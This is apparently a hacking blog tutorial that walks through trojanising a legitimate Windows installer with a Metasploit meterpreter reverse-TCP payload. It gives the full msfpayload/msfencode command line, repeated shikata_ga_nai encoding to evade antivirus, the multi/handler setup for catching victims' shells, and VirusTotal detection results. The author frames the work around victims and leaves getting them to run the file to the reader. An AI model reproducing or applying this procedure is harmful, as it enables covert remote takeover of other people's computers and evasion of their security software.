How was the weekend?? All good and hung over? Good! For today a tutorial on how to backdoor any .EXE file with msfpayload. About a decade ago when i first discovered RAT (Remote Administration Tool) programs, i had to go through various binders, cryptors and icon changers to try and successfully bind an .EXE with an exploit or malware. Finding an undetectable RAT was an even bigger problem. Of course back then my programming skills were beyond shit for me to whip up a stable undetectable RAT, so plan B was to whip up a shitty winsock program in Visual Basic. It was a horrible, unstable program but it was undetectable and i could bind it with the .EXE without any worry of AV detection. It did enough to get me access into the victims computer long enough so i could modify the AV files and upload a working stable detectable RAT. Oh fun times!!
But how time flies!. Thanks to the beauty that is Metasploit, we can now backdoor any .EXE file!
NOTE:This tutorial will only demonstrate how to bind an .exe with a metasploit payload. I will not be explaining the ways to get your victims to execute it. Your creativity is your duty. You may download the PDF version of this tutorial here.
Lets Begin :
1) Locate your .exe and place it in your Home directory as shown below.
2) To list the available payloads, type : msfpayload -l.
3) As shown below, we will be using windows/meterpreter/bind_tcp.
4) Syntax to bind file : msfpayload <payload> <LHOST=>< LPORT= >R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x <.exe location> -o <output file name>.
5) So in my case i would type : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=666 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x/root/devcpp-setup.exe -o /root/dedcpp-modified.exe.
6) I have instructed msfpayload to bind my .exe with a meterpreter/reverse_tcp payload and to encode it 6 times with x86/shikata_ga_nai. It is also set to establish a connection to my port 666.
5) Our newly modified file can be located in our Home directory.
6) Now that we have our modified executable ready, we will need to set up a handler to manage incoming connections from our victims. Lets proceed to open a fresh tab and type : msconsole.
7) To set exploit option, type : use exploit/multi/handler.
8) Set the same payload type, IP address and port number that you declared when creating your modified .EXE (refer to point 6) for LHOST and LPORT.
9) Finally to start your handler, type : exploit.
10) Now when you run the .exe on a victim computer or find a way to get them to execute it. Your handler terminal will be prompted with a meterpreter shell from your targets computer and access will be granted!
11) For the fun of it, i decided to scan the modified .EXE with virus total. 7/41 detections, which i think is pretty decent for a standard set up. We used x86/shikata_ga_nai to encode our file 6 times, do try and encode it with different encoding options to see various results.
12) You can retrieve the various encoding options by typing show encoders in your msfconsole terminal.
Authors Note :
1) This just demonstrates how to backdoor an exe for a local area network attack. You can easily make this an over the internet attack by a few tweak to your settings. (eg: port-forwarding, modifying payload option) I will get to that in the upcoming lessons. You may download the PDF version of this tutorial here.
2)This is for educational purposes only.
3)Do NOT harm the innocent.
“Reality is just a crutch for people who can’t handle drugs.” ― Robin P. Williams
<– Metasploit : Create, upload & exploit with java payload (.jsp)